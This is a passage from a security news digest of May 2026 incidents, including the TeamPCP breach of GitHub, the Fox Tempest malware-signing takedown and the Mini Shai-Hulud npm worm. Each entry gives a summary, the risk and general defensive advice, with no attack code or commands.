GitHub confirmed a data breach in which a threat actor named TeamPCP stole over 4,000 internal source code repositories. The breach could expose proprietary software, credentials, and intellectual property, significantly impacting GitHub and potentially its customers. GitHub is investigating the incident and has taken steps to secure its systems. Organizations should review their use of GitHub-hosted repositories and consider rotating secrets and credentials that may have been exposed. The incident underscores the importance of robust access controls and monitoring for unauthorized data exfiltration.

Why do I care?

This breach exposes sensitive internal repositories that may contain secrets, credentials, and intellectual property, posing risks of further targeted attacks or supply chain compromises.

What can I do about it?

Rotate any credentials or secrets stored in affected repositories, enable multi-factor authentication, and monitor for anomalous access patterns that might indicate data exfiltration or lateral movement.

Classification

Incident, High Severity, Data Breach

Source

Source feed: Dark Reading | Original source

Microsoft Takes Down Malware-Signing Service Behind Ransomware Attacks

info@thehackernews.com (The Hacker News) — Wed, 20 May 2026 14:36:44 GMT

AI Summary

Microsoft disrupted a malware-signing-as-a-service (MSaaS) operation that abused its Artifact Signing system to sign malicious code, enabling ransomware and other attacks. The threat actor Fox Tempest offered this service, compromising thousands of machines globally. The takedown removes a key enabler for ransomware operations, highlighting the abuse of trusted signing services.

Why do I care?

This operation enabled ransomware attacks against thousands of organizations by bypassing security controls through signed malware.

What can I do about it?

Monitor for unauthorized use of code signing certificates and enforce strict controls on signing processes to prevent abuse.

Classification

Malware, High Severity, Malware-as-a-Service, Ransomware

Source

Source feed: The Hacker News | Original source

Webworm Deploys EchoCreep and GraphWorm Backdoors Using Discord and MS Graph API

info@thehackernews.com (The Hacker News) — Wed, 20 May 2026 12:51:43 GMT

AI Summary

In 2025, the China-aligned threat actor Webworm has been observed deploying two custom backdoors, EchoCreep and GraphWorm, which utilize Discord and Microsoft Graph API for command-and-control communications. Targeting government agencies, this campaign demonstrates the group's continued evolution and reliance on legitimate services to evade detection. The use of widely trusted platforms like Discord and Microsoft Graph API makes their C2 traffic blend in with normal network activity, posing a significant challenge for defenders. Organizations should monitor anomalous API calls and Discord usage, and apply strict controls on outbound traffic to mitigate this threat.

Why do I care?

Webworm is a China-aligned APT actively targeting government agencies with backdoors that abuse popular services like Discord and Microsoft Graph API, enabling stealthy data exfiltration and persistent access.

What can I do about it?

Implement network monitoring for unusual Discord and MS Graph API traffic, restrict API access to approved applications, and deploy endpoint detection rules to identify the EchoCreep and GraphWorm backdoors.

Classification

Malware, High Severity, Backdoor, Command and Control via Legitimate Services

Source

Source feed: The Hacker News | Original source

GitHub Confirms Hack Impacting 3,800 Internal Repositories

Ionut Arghire — Wed, 20 May 2026 09:28:53 GMT

AI Summary

The TeamPCP hacking group gained access to 3,800 of GitHub's internal repositories after an employee installed a poisoned Visual Studio Code extension. The incident highlights the risks of software supply chain attacks via compromised developer tools. GitHub confirmed the breach, which affected internal code and potentially sensitive data. Organizations should enforce strict extension vetting and user education to prevent similar attacks.

Why do I care?

Internal repositories contain proprietary code and secrets; unauthorized access can lead to data theft or further compromise.

What can I do about it?

Implement strict controls on allowed extensions, conduct security training, and monitor for anomalous file access.

Classification

Malware, High Severity, Supply Chain Compromise, Trojanized Software

Source

Source feed: SecurityWeek | Original source

A malicious VS code extension just breached GitHub ‘s internal repositories

Pierluigi Paganini — Wed, 20 May 2026 08:50:50 GMT

AI Summary

GitHub suffered a breach after an employee installed a trojanized Visual Studio Code extension from the official marketplace. The attack resulted in the exfiltration of approximately 3,800 internal repositories. The cybercrime group TeamPCP claimed responsibility and is demanding at least $50,000 for the stolen data, threatening public release if unpaid. GitHub detected the intrusion, removed the malicious extension, isolated the endpoint, and initiated incident response. The company stated that no customer data outside the affected repositories appears compromised, though investigations continue. The incident underscores the persistent risk of supply chain attacks targeting developer tools, as malicious extensions can bypass marketplace security and lead to major data breaches.

Why do I care?

Even security-conscious organizations like GitHub can be breached through a single employee installing a malicious IDE extension, demonstrating that supply chain attacks on development tools pose a critical risk to intellectual property and internal systems.

What can I do about it?

Enforce strict policies on extension installations, limit developer endpoints to approved extensions only, implement behavior-based monitoring for unusual data exfiltration, and conduct regular security awareness training focused on trusted software supply chains.

Classification

Malware, Critical Severity, Data Theft, Extortion

Source

Source feed: Security Affairs (Data Breach) | Original source

Webworm: New burrowing techniques

Wed, 20 May 2026 08:40:00 GMT

AI Summary

ESET researchers have uncovered new tools and techniques adopted by the Webworm APT group, enhancing their capability for cyber espionage. The group's updated arsenal increases the threat to targeted organizations, particularly in sectors of strategic interest. These developments highlight the need for heightened vigilance and adaptive defenses to counter the evolving tactics of this persistent threat actor. Organizations should review their security measures to mitigate potential breaches and data exfiltration risks.

Why do I care?

The Webworm APT group's new tools and techniques expand their ability to infiltrate networks and steal sensitive data, raising the risk of significant compromise for targeted organizations.

What can I do about it?

Strengthen endpoint detection and response capabilities, monitor for unusual network activity and apply the latest security patches to counter these emerging threats.

Classification

Adversary, High Severity, Advanced Persistent Threat

Source

Source feed: ESET WeLiveSecurity | Original source

GitHub investigates internal repositories breach claimed by TeamPCP

Sergiu Gatlan — Wed, 20 May 2026 05:08:42 GMT

AI Summary

The TeamPCP hacker group claimed to have breached GitHub's internal repositories, gaining access to approximately 4,000 private code repositories. GitHub is investigating the claim, which if confirmed, could expose sensitive proprietary code and internal tools. The incident underscores the risk of insider or credential-based attacks targeting development environments. Organizations should enforce strict access controls and monitor for anomalous repository access.

Why do I care?

A breach of internal repositories can expose proprietary code, secrets, and intellectual property, leading to competitive disadvantage or further attacks.

What can I do about it?

Implement repository-level access controls, audit access logs, enable multi-factor authentication for code repositories, and consider using encrypted code storage and monitoring for unauthorized access.

Classification

Incident, High Severity, Data Breach

Source

Source feed: Bleeping Computer | Original source

GitHub Investigating TeamPCP Claimed Breach of ~4,000 Internal Repositories

info@thehackernews.com (The Hacker News) — Wed, 20 May 2026 04:01:15 GMT

AI Summary

Threat actor TeamPCP claimed to have breached GitHub's internal repositories and listed source code for sale. GitHub is investigating, stating no evidence of customer data impact. The breach involves unauthorized access to proprietary code, which could lead to intellectual property theft and further targeted attacks. Mitigation measures include reviewing access controls, rotating secrets, and monitoring for suspicious activity.

Why do I care?

The theft of GitHub's internal source code could expose proprietary algorithms and security measures, increasing risk for customers and the broader ecosystem.

What can I do about it?

Organizations should audit access to their source code repositories, enforce MFA, and monitor for anomalous downloads or exfiltration attempts.

Classification

Incident, High Severity, Data Exfiltration

Source

Source feed: The Hacker News | Original source

Microsoft Self-Service Password Reset abused in Azure data theft attacks

Bill Toulas — Tue, 19 May 2026 19:35:32 GMT

AI Summary

A threat actor tracked as STORM-1811 is actively targeting Microsoft 365 and Azure production environments by abusing legitimate applications such as Self-Service Password Reset (SSPR) and Azure AD administrative features. The attackers gain initial access through brute force, password spray, and phishing campaigns. Once inside, they exploit SSPR to persist and escalate privileges, enabling data theft. The campaign highlights the risk of abused native cloud features, which can evade traditional defenses. Organizations relying on Microsoft 365 and Azure should monitor for unusual SSPR activity, enforce multifactor authentication, and review privileged role assignments to mitigate this threat.

Why do I care?

This attack abuses trusted admin features like SSPR, allowing threat actors to blend in with normal activities and steal sensitive data from production environments.

What can I do about it?

Audit SSPR usage logs for unauthorized password resets, enforce strong MFA policies, and monitor for anomalous Azure AD administrative role assignments.

Classification

Adversary, High Severity, Account Takeover, Data Theft

Source

Source feed: Bleeping Computer | Original source

durabletask: TeamPCP's Latest PyPi Compromise

Rami McCarthy — Tue, 19 May 2026 17:30:20 GMT

AI Summary

This article reports that malicious versions of the PyPi package durabletask have been discovered, attributed to the threat actor TeamPCP. The compromised package likely contains trojanized code that can lead to supply chain attacks. Organizations using this package should audit their dependencies. The impact could include unauthorized access and execution of malicious code. Mitigation involves verifying package integrity, updating to safe versions, and monitoring for suspicious behavior.

Why do I care?

Supply chain attacks through compromised PyPi packages can affect numerous downstream users, potentially leading to widespread breaches.

What can I do about it?

Audit your projects for use of the durabletask package, verify its integrity against known hashes, and consider using package scanning tools to detect malicious components.

Classification

Other, High Severity, Supply Chain Compromise

Source

Source feed: Wiz Security Research | Original source

Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’

Eduard Kovacs — Tue, 19 May 2026 16:06:22 GMT

AI Summary

Microsoft disrupted a malware-signing service operated by the threat actor Fox Tempest. This service was used by cybercriminals to sign ransomware and other malware with valid code signing certificates, allowing the malicious software to appear legitimate and evade security defenses. The disruption removes a key enabler for ransomware operations, reducing the ability of adversaries to distribute signed malware. Organizations are advised to remain vigilant and enforce strict code signing verification, as the service's takedown may temporarily reduce but not eliminate the threat from signed malware.

Why do I care?

Fox Tempest's signing service enabled ransomware operators to bypass security defenses by masquerading malicious executables as legitimate software, increasing the risk of successful compromise.

What can I do about it?

Enforce strict code signing policies, inspect all signed binaries for validity, and deploy endpoint detection solutions capable of identifying anomalous signing behavior and signed malware.

Classification

Malware, High Severity, Ransomware

Source

Source feed: SecurityWeek | Original source

Exposing Fox Tempest: A malware-signing service operation

Microsoft Threat Intelligence — Tue, 19 May 2026 15:07:01 GMT

AI Summary

Fox Tempest is a financially motivated threat actor operating a malware-signing-as-a-service (MSaaS) that abuses Microsoft Artifact Signing to provide short-lived, fraudulently signed certificates to other cybercriminals, including Vanilla Tempest and Storm groups. This service enables trusted delivery of malware such as Rhysida ransomware, Oyster, Lumma Stealer, and Vidar, allowing them to bypass security controls and successfully execute on victim systems. Over a thousand certificates and hundreds of Azure subscriptions were established, impacting sectors like healthcare, education, government, and finance globally. In May 2026, Microsoft's Digital Crimes Unit disrupted the service, revoking certificates and taking down infrastructure. Organizations are urged to use advanced detection and endpoint security solutions to mitigate signed malware threats.

Why do I care?

Fox Tempest provides signed malware to ransomware operators, bypassing traditional security controls and increasing the risk of successful compromise and extortion across a wide range of industries.

What can I do about it?

Implement endpoint detection and response (EDR) with behavioral analytics, enforce application control policies, and regularly review and revoke suspicious signing certificates using Microsoft Defender's indicators of compromise.

Classification

Malware, High Severity, Malware Distribution, Ransomware

Source

Source feed: Microsoft Security Blog | Original source

7-Eleven confirms data breach claimed by the ShinyHunters gang

Sergiu Gatlan — Tue, 19 May 2026 14:16:41 GMT

AI Summary

7-Eleven confirmed a data breach claimed by the ShinyHunters extortion group. The incident exposed customer data, and the group is likely to demand a ransom. The breach underscores the persistent threat from cybercriminal groups targeting large retailers. Mitigation includes enhancing network segmentation, enforcing multi-factor authentication, and conducting regular security audits.

Why do I care?

A confirmed breach at a major retailer like 7-Eleven indicates that attackers can compromise sensitive customer data, leading to financial and reputational damage.

What can I do about it?

Implement robust access controls, enable logging and monitoring for unusual data exfiltration, and ensure incident response plans are up to date to quickly contain such breaches.

Classification

Malware, High Severity, Data Breach, Extortion

Source

Source feed: Bleeping Computer | Original source

B1ack’s Stash Marketplace Gives Away 4.6 Million Stolen Credit Cards

Ionut Arghire — Tue, 19 May 2026 11:59:13 GMT

AI Summary

A marketplace known as B1ack's Stash has released 4.6 million stolen credit card numbers for free download, reportedly due to seller misconduct. This massive disclosure poses a significant risk of financial fraud and identity theft for affected individuals. The data can be used for unauthorized purchases, account takeovers, and other criminal activities. Organizations should take immediate steps to protect their customers and systems, including enhancing fraud detection and alerting cardholders. The incident highlights the ongoing threat of stolen financial data being traded on underground markets.

Why do I care?

The free distribution of millions of stolen credit cards increases the attack surface for financial fraud, putting both consumers and financial institutions at risk.

What can I do about it?

Deploy robust fraud detection systems, encourage reissuance of affected cards, and educate customers on monitoring transactions.

Classification

Other, High Severity, Data Theft, Financial Fraud

Source

Source feed: SecurityWeek | Original source

From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat

Joey Chen — Tue, 19 May 2026 10:00:20 GMT

AI Summary

Cisco Talos has identified a commercially distributed BadIIS variant operated under a malware-as-a-service model, likely targeting Chinese-speaking cybercriminal networks. Tracked since 2021 and actively maintained through early 2026, this commodity malware automates web server compromise on Microsoft IIS infrastructure. Primary objectives include malicious SEO fraud, content hijacking, and traffic redirection for search engine manipulation. The toolset features robust persistence mechanisms, automated deployment, and advanced obfuscation techniques to evade antivirus detection and survive server restarts. Impact spans global IIS deployments, enabling attackers to monetize traffic and exploit search engine rankings. Defense strategies should prioritize monitoring IIS service anomalies, auditing registered PDB paths and custom binaries, and enforcing strict application whitelisting. Continuous log analysis and proactive threat hunting for known MaaS distribution patterns are recommended.

Why do I care?

This actively maintained, commercially distributed BadIIS variant poses a significant risk to organizational IIS deployments by enabling persistent server compromise, traffic hijacking, and lucrative SEO fraud campaigns. Its MaaS distribution model increases the likelihood of targeted, automated attacks across your infrastructure.

What can I do about it?

Audit IIS installations for unauthorized binaries, validate executable PDB strings against known developer profiles, and enforce application control policies to block unsigned or anomalous web server components. Implement rigorous monitoring for unexpected outbound traffic redirection and search engine crawling anomalies.

Classification

Malware, High Severity, Malware-as-a-Service (MaaS), SEO Fraud, Traffic Manipulation

Source

Source feed: Cisco Talos Intelligence Group | Original source

The Worm That Keeps on Digging: TeamPCP Hits @antv in Latest Wave

Merav Bar — Tue, 19 May 2026 08:29:30 GMT

AI Summary

TeamPCP is conducting a multi-ecosystem supply chain compromise targeting GitHub, NPM, and VSCode. The attack aims to steal credentials and establish persistence within developer environments. This campaign leverages the trusted nature of these platforms to reach a wide audience, posing significant risks to organizations that rely on open-source components. The impact includes credential theft, potential code integrity loss, and downstream compromise of software supply chains. Urgent action is needed to strengthen supply chain security, monitor for malicious extensions, and enforce strict access controls.

Why do I care?

This attack targets developer ecosystems, compromising credentials and code integrity, which can lead to widespread supply chain breaches.

What can I do about it?

Implement rigorous supply chain security, vet third-party extensions, and enforce least privilege for developer accounts.

Classification

Malware, High Severity, Credential Theft, Supply Chain Compromise

Source

Source feed: Wiz Security Research | Original source

GitHub Actions Supply Chain Attack Redirects Tags to Steal CI/CD Credentials

info@thehackernews.com (The Hacker News) — Tue, 19 May 2026 05:28:06 GMT

AI Summary

Threat actors compromised the popular GitHub Actions workflow 'actions-cool/issues-helper' in a supply chain attack. By redirecting all existing tags to an imposter commit, they injected malicious code that harvests sensitive CI/CD credentials and exfiltrates them to an attacker-controlled server. This attack highlights the risk of trusting third-party actions in development pipelines, as compromised workflows can lead to widespread credential theft and further compromise. Organizations using this action should immediately audit their usage, rotate any exposed secrets, and consider pinning actions to commit hashes rather than tags to prevent similar tag-redirection attacks.

Why do I care?

This supply chain attack targets trusted GitHub Actions workflows to steal CI/CD credentials, which can lead to widespread compromise of your software development pipeline and infrastructure.

What can I do about it?

Immediately audit and rotate any credentials accessed by this action, and switch to pinning actions by commit SHA instead of tags to prevent tag-redirection attacks.

Classification

Adversary, High Severity, Credential Theft, Supply Chain Attack

Source

Source feed: The Hacker News | Original source

Mini Shai-Hulud Pushes Malicious AntV npm Packages via Compromised Maintainer Account

info@thehackernews.com (The Hacker News) — Tue, 19 May 2026 04:54:17 GMT

AI Summary

The Mini Shai-Hulud supply chain attack campaign has compromised multiple npm packages in the @antv ecosystem by hijacking the maintainer account 'atool'. The widely used package 'echarts-for-react' (over 1.1 million weekly downloads) was trojanized, posing a significant risk to downstream consumers. Organizations should immediately audit their use of affected packages, verify integrity, and monitor for suspicious updates to prevent code execution and data theft.

Why do I care?

A compromised maintainer account led to malicious updates in a popular package with over a million weekly downloads, directly exposing developers and users to supply chain risks.

What can I do about it?

Pin package versions, review code changes before updating, and employ integrity verification (e.g., SLS, Sigstore) to detect tampered packages.

Classification

Adversary, High Severity, Malicious Package, Software Supply Chain Attack

Source

Source feed: The Hacker News | Original source

Mini Shai-Hulud Hits AntV: 300+ Malicious npm Packages Published via Compromised Maintainer Account

Mon, 18 May 2026 23:00:00 GMT

AI Summary

A supply chain attack via the npm ecosystem targeted the AntV data visualization library. Over 300 malicious package versions were published across 323 packages after a maintainer account was compromised. This is part of the ongoing Mini Shai-Hulud worm campaign, which aims to distribute malware via trusted packages. The attack highlights the risk of compromised credentials in open-source ecosystems. Immediate actions include auditing npm dependencies for affected packages, rotating credentials, and implementing multi-factor authentication. The impact is widespread, potentially affecting any project using the compromised packages. Organizations should review their software supply chain and monitor for unusual activity.

Why do I care?

This attack compromises the software supply chain by injecting malicious code into widely-used npm packages, potentially affecting numerous downstream users and leading to data theft or further compromise.

What can I do about it?

Immediately audit your dependencies for any package versions from the AntV ecosystem published after the compromise date, rotate any compromised npm token or account credentials, and enable multi-factor authentication.

Classification

Malware, High Severity, Supply Chain Compromise, Trojan

Source

Source feed: Snyk Blog | Original source

How Storm-2949 turned a compromised identity into a cloud-wide breach

Microsoft Defender Security Research Team — Mon, 18 May 2026 22:42:50 GMT

AI Summary

Storm-2949 executed a sophisticated cloud breach by compromising identities through social engineering and Self-Service Password Reset (SSPR) abuse, bypassing MFA and gaining persistent access. They moved laterally across Microsoft 365 and Azure environments, exfiltrating sensitive data from M365 apps, Azure Storage, SQL databases, and Key Vaults using legitimate administrative features without malware, employing ScreenConnect for remote access and defense evasion. This incident underscores the critical risk of identity compromise in cloud environments. Microsoft recommends robust identity protections, conditional access, and behavior-based detection to mitigate such threats.

Why do I care?

This attack shows that a single compromised identity can lead to a full cloud-wide breach and massive data exfiltration without malware, highlighting the need for comprehensive identity protection and visibility across cloud layers.

What can I do about it?

Enforce multifactor authentication with number matching, monitor SSPR abuse, implement conditional access policies, use behavior-based detection tools like Microsoft Defender for Cloud Apps and Defender for Identity, and apply least-privilege access for cloud resources.

Classification

Malware, Critical Severity, Cloud Compromise, Credential Access, Data Exfiltration

Source

Source feed: Microsoft Security Blog | Original source

TeamPCP Supply Chain Campaign: Activity Through 2026-05-17, (Mon, May 18th)

Mon, 18 May 2026 20:08:00 GMT

AI Summary

The TeamPCP supply chain campaign has escalated with two major developments: an officially confirmed compromise of the Checkmarx Jenkins plugin and a new self-spreading worm named Mini Shai-Hulud distributed via npm and PyPI. These threats target software supply chains, potentially affecting many downstream users. Organizations should review their use of affected components and bolster software supply chain defenses.

Why do I care?

Supply chain attacks can compromise trusted software dependencies, enabling widespread initial access and lateral movement across multiple targets.

What can I do about it?

Implement software bill of materials (SBOM) practices, monitor for suspicious updates to plugins and packages, and enforce code signing and integrity verification.

Classification

Adversary, High Severity, Supply Chain Attack, Worm

Source

Source feed: SANS Internet Storm Center | Original source

Grafana confirms GitHub token breach cybercrime group claims the attack

Pierluigi Paganini — Mon, 18 May 2026 18:54:22 GMT

AI Summary

Grafana Labs confirmed a security incident after the extortion group Coinbase Cartel listed it on a leak site, claiming data theft. The breach was caused by a compromised GitHub token that exposed source code repositories. Grafana stated that no customer data or systems were affected. The company revoked credentials and is conducting a forensic investigation. While no customer impact was reported, stolen source code poses risks including vulnerability analysis and supply chain attacks. The incident highlights the critical need for robust token security, short-lived tokens, strict scoping, and phishing-resistant MFA to protect development environments.

Classification

Other, Medium Severity, Data Theft, Extortion

Source

Source feed: Security Affairs (Data Breach) | Original source

18th May – Threat Intelligence Report

urias — Mon, 18 May 2026 14:58:29 GMT

AI Summary

This week's threat intelligence report covers multiple critical incidents: ransomware attacks on West Pharmaceutical and Foxconn (claimed by Nitrogen), a source code leak at Vodafone allegedly by Lapsus$, and a $10.7M theft from THORChain. Critical vulnerabilities include YellowKey and GreenPlasma in Windows, CVE-2026-42945 in NGINX, CVE-2026-20182 in Cisco Catalyst SD-WAN (actively exploited), and CVE-2026-28819 in Apple products. AI threats involve Claw Chain vulnerabilities in OpenClaw, an AI-assisted macOS kernel exploit bypassing M5 security, and mass-produced phishing pages via Vercel's v0.dev. A Hugging Face repository disguised as OpenAI's privacy filter infected over 200,000 downloads with an infostealer. Check Point Research also analyzed an internal leak from The Gentlemen ransomware operation and reported Q1 2026 ransomware trends showing 2,122 leak-site victims, with Qilin leading. Organizations should prioritize patching, monitor for AI-driven phishing, and deploy advanced threat detection.

Why do I care?

Organizations face immediate risk from exploited vulnerabilities and ransomware attacks targeting major supply chains; unpatched systems could lead to data breaches and operational disruption.

What can I do about it?

Prioritize patching for critical CVEs (CVE-2026-44112, CVE-2026-42945, CVE-2026-20182), implement multi-layered security controls, and educate users on phishing threats using AI-generated content.

Classification

Vulnerability, Critical Severity, Phishing, Ransomware, Vulnerability Exploitation

Source

Source feed: Check Point Research | Original source

ShinyHunters hack 7-Eleven: franchisee data and Salesforce records exposed

Pierluigi Paganini — Mon, 18 May 2026 13:48:01 GMT

AI Summary

ShinyHunters breached 7-Eleven, stealing over 600,000 Salesforce records containing PII and corporate data. The group threatened to publish the data if a ransom was not paid by April 21. 7-Eleven confirmed the incident, noting unauthorized access to systems storing franchisee documents on April 8, 2026. The breach exposes sensitive franchise applicant information, and the full impact is still under investigation. ShinyHunters has previously targeted major organizations, often focusing on Salesforce instances.

Why do I care?

ShinyHunters is actively targeting Salesforce instances, and this breach demonstrates the risk of exposing sensitive franchisee data, which can lead to financial and reputational damage.

What can I do about it?

Secure Salesforce instances with strong access controls, enable multi-factor authentication, monitor for anomalous activity, and ensure incident response plans include data extortion scenarios.

Classification

Malware, High Severity, Data Breach, Extortion

Source

Source feed: Security Affairs (Data Breach) | Original source

IT threat evolution in Q1 2026. Non-mobile statistics

AMR — Mon, 18 May 2026 12:00:22 GMT

AI Summary

In Q1 2026, ransomware activity remains high, with Kaspersky blocking over 343 million attacks and detecting nearly 3,000 new ransomware variants. Law enforcement achieved notable successes, including the seizure of the RAMP cybercrime forum domains, and arrests related to the Phobos and BlackCat groups. A zero-day vulnerability in Cisco Secure FMC (CVE-2026-20131) was heavily exploited by the Interlock group for initial access. Clop ransomware led the most prolific groups by victim count on data leak sites, followed by Qilin and emerging group The Gentlemen. The quarter saw 77,319 unique users attacked, with the highest activity in March. Key mitigation includes patching critical vulnerabilities, network segmentation, and maintaining offline backups. The threat landscape underscores the need for proactive defense against evolving ransomware operations.

Why do I care?

Ransomware groups are actively exploiting zero-day vulnerabilities in network appliances and leveraging data leak sites for extortion, posing a direct threat to organizational data and operations.

What can I do about it?

Immediately patch CVE-2026-20131 in Cisco Secure FMC, implement strict access controls, and ensure comprehensive backup and incident response plans are in place to mitigate ransomware impact.

Classification

Malware, High Severity, Ransomware

Source

Source feed: Kaspersky Securelist | Original source

7-Eleven Data Breach Confirmed After ShinyHunters Ransom Demand

Eduard Kovacs — Mon, 18 May 2026 11:25:54 GMT

AI Summary

The convenience store chain 7-Eleven confirmed a data breach after the threat actor group ShinyHunters demanded a ransom. The hackers claim to have stolen over 600,000 Salesforce records containing personal and corporate data. The breach underscores the risk of third-party data stores and the growing trend of extortion-driven attacks. Organizations should prioritize securing cloud-based CRM platforms and implement robust access controls and monitoring. The incident highlights the need for rapid incident response and proactive threat hunting to mitigate data exfiltration and ransomware-related impacts.

Why do I care?

This breach demonstrates that even large enterprises are vulnerable to data exfiltration via compromised cloud services, potentially exposing sensitive customer and corporate information to extortion.

What can I do about it?

Immediately audit third-party integrations like Salesforce for unusual access patterns, enforce multi-factor authentication, and ensure backup strategies are in place to recover data without paying ransom.

Classification

Malware, High Severity, Data Theft, Ransomware

Source

Source feed: SecurityWeek | Original source

Developer Workstations Are Now Part of the Software Supply Chain

info@thehackernews.com (The Hacker News) — Mon, 18 May 2026 11:23:41 GMT

AI Summary

The article highlights a growing trend in software supply chain attacks where adversaries target developer environments and CI/CD pipelines to steal secrets such as API keys, cloud credentials, SSH keys, and tokens. Three coordinated campaigns against npm, PyPI, and Docker Hub within 48 hours exemplify this shift. Instead of injecting malicious code, attackers aim to compromise the access that underpins trusted software, potentially enabling broader infiltration of downstream systems. This emphasizes the need for robust secret management and security controls in development workflows.

Why do I care?

Attackers are increasingly targeting developer credentials and CI/CD secrets to gain privileged access to your software supply chain, potentially compromising every product you release.

What can I do about it?

Implement strict secret scanning and rotation policies, enforce multi-factor authentication for CI/CD access, and monitor developer environments for unusual activity or unauthorized token usage.

Classification

Adversary, High Severity, Credential Theft, Supply Chain Compromise

Source

Source feed: The Hacker News | Original source

Grafana Confirms Breach After Hackers Claim They Stole Data

Eduard Kovacs — Mon, 18 May 2026 08:34:59 GMT

AI Summary

Grafana confirmed a data breach perpetrated by the cybercrime group Coinbase Cartel, which is linked to notable actors ShinyHunters, Scattered Spider, and Lapsus$. The attackers claimed to have stolen data, and Grafana acknowledged the incident. The breach exposes sensitive internal information, potentially impacting customers and operations. Immediate investigation and remediation are crucial to mitigate further damage. Organizations should review their security posture and monitor for any leaked data or related phishing attempts.

Why do I care?

This breach indicates that threat actors, some with high-profile connections, successfully exfiltrated data from a major analytics platform, exposing sensitive corporate information that could be used for further attacks or extortion.

What can I do about it?

Immediately assess any connections to Grafana services, rotate secrets and credentials that may be exposed, and enhance monitoring for suspicious activity involving Grafana-related systems and data.

Classification

Incident, High Severity, Data Breach, Data Theft

Source

Source feed: SecurityWeek | Original source

Russian hackers turn Kazuar backdoor into modular P2P botnet

Bill Toulas — Sat, 16 May 2026 14:15:37 GMT

AI Summary

The Russian state-sponsored group Secret Blizzard has upgraded its Kazuar backdoor into a modular peer-to-peer (P2P) botnet, enhancing stealth, persistence, and data collection capabilities. This evolution allows the malware to operate resiliently by avoiding centralized control, making takedown more difficult. The threat primarily targets high-value entities in government, defense, and technology sectors, exfiltrating sensitive information over extended periods.

Why do I care?

Secret Blizzard's updated Kazuar botnet represents a sophisticated, persistent threat that can evade detection and maintain long-term access within networks, posing significant risk to sensitive data and national security.

What can I do about it?

Implement network segmentation and monitor for P2P communication patterns, deploy endpoint detection and response (EDR) solutions with behavioral analytics, and conduct regular threat hunting for signs of Kazuar activity.

Classification

Malware, High Severity, Backdoor, Botnet

Source

Source feed: Bleeping Computer | Original source

Turla Turns Kazuar Backdoor Into Modular P2P Botnet for Persistent Access

info@thehackernews.com (The Hacker News) — Fri, 15 May 2026 17:10:25 GMT

AI Summary

The Russian state-sponsored APT group Turla has updated its Kazuar backdoor into a modular peer-to-peer (P2P) botnet designed for stealth and persistent access to compromised hosts. Attributed to FSB Center 16 by CISA, this evolution enables robust command and control resilience, hindering takedown efforts. The P2P architecture reduces reliance on centralized infrastructure, complicating detection and mitigation. Organizations, especially those in government and defense sectors, are at risk from this advanced persistent threat.

Why do I care?

Turla's Kazuar P2P botnet poses a high risk due to its stealthy, persistent access capabilities, enabling long-term espionage and data theft by a sophisticated state actor.

What can I do about it?

Implement network segmentation, monitor for anomalous P2P traffic, and deploy endpoint detection solutions focused on behavioral indicators of Kazuar and similar backdoors.

Classification

Malware, High Severity, Backdoor, Botnet, Persistent Access

Source

Source feed: The Hacker News | Original source

In Other News: Big Tech vs Canada Encryption Bill, Cisco’s Free AI Security Spec, Audi App Flaws

SecurityWeek News — Fri, 15 May 2026 14:52:16 GMT

AI Summary

This article covers multiple security stories including a data breach at Nvidia's cloud gaming service, Android 17 security upgrades, and an FBI warning about ShinyHunters compromising the Canvas platform. It also mentions vulnerabilities in the Audi app. The incidents highlight risks to user data and system integrity. Users and organizations should apply security patches and monitor for suspicious activity associated with ShinyHunters.

Classification

Vulnerability, Medium Severity, Data Breach, Vulnerability Exploitation

Source

Source feed: SecurityWeek | Original source

Welcome to BlackFile: Inside a Vishing Extortion Operation

Google Threat Intelligence Group — Fri, 15 May 2026 14:00:00 GMT

AI Summary

Google Threat Intelligence Group reports that UNC6671, operating under the "BlackFile" brand, executes a highly coordinated extortion campaign leveraging voice phishing (vishing) and adversary-in-the-middle techniques to compromise cloud identities. Targeting Microsoft 365 and Okta environments, the group bypasses traditional perimeter controls and multi-factor authentication to establish persistent access. Using automated scripts, attackers programmatically exfiltrate sensitive corporate data from SharePoint, OneDrive, and CRM systems at scale. Despite recently retiring the BlackFile data leak site and declaring a shutdown under this name, the threat cluster's techniques remain active and representative of a broader shift toward identity-centric data theft. Organizations must prioritize phishing-resistant MFA, monitor identity provider logs for anomalous authentication flows, and enforce strict auditing on high-volume SaaS API access to detect and prevent unauthorized data extraction.

Why do I care?

Extortion groups like UNC6671 exploit identity-based attacks to bypass traditional security perimeters, leading to large-scale data theft and significant financial and reputational damage.

What can I do about it?

Deploy phishing-resistant MFA, monitor identity provider logs for unauthorized authentication flows, and audit high-volume SaaS API access to detect automated data exfiltration early.

Classification

Vulnerability, High Severity, Cloud Infrastructure Compromise, Extortion, Identity Theft

Source

Source feed: Mandiant Frontline Blog | Original source

The Good, the Bad and the Ugly in Cybersecurity – Week 20

SentinelOne — Fri, 15 May 2026 13:00:14 GMT

AI Summary

This week's cybersecurity highlights include the takedown of dark web markets Crimenetwork and Dream Market by European and US authorities. In a major incident, threat group ShinyHunters exploited multiple XSS flaws in Instructure's Canvas LMS, exfiltrating 3.6TB of data containing 280 million records from nearly 8,900 educational institutions. They defaced login portals during finals, demanding ransom. Additionally, Google TAG reports threat actors using AI to discover and weaponize zero-day vulnerabilities, with state-sponsored groups from China, North Korea, and Russia leveraging LLMs for exploit development and obfuscation. This AI-driven acceleration compresses patch windows from weeks to hours, demanding urgent defensive adaptation.

Why do I care?

The AI-assisted zero-day discovery and massive Canvas breach demonstrate that attackers are rapidly advancing, exposing sensitive data and shortening patch timelines, leaving organizations vulnerable if they do not adapt.

What can I do about it?

Accelerate patch management processes, implement web application firewalls, and monitor for anomalous session activity. Educate users on AI-driven social engineering and deploy multi-layered authentication to mitigate session hijacking and credential theft.

Classification

Malware, Critical Severity, Data Breach, Extortion, Ransomware

Source

Source feed: SentinelOne | Original source

TeamPCP Ups the Game, Releases Shai-Hulud Worm’s Source Code

Ionut Arghire — Fri, 15 May 2026 09:47:09 GMT

AI Summary

TeamPCP, a hacking group, has released the source code for the Shai-Hulud worm, encouraging its use in supply chain attacks and offering monetary rewards. This worm, now publicly available, poses a significant threat to organizations by enabling worm-based attacks that can spread through software supply chains. The release lowers the barrier for less skilled attackers, potentially increasing the frequency of supply chain compromises. Organizations should assess their supply chain risks, monitor for indicators of compromise associated with Shai-Hulud, and implement robust security controls to defend against worm propagation and payload delivery.

Why do I care?

The public release of Shai-Hulud worm source code enables widespread supply chain attacks, threatening organizational integrity and trust with potential for significant operational and reputational damage.

What can I do about it?

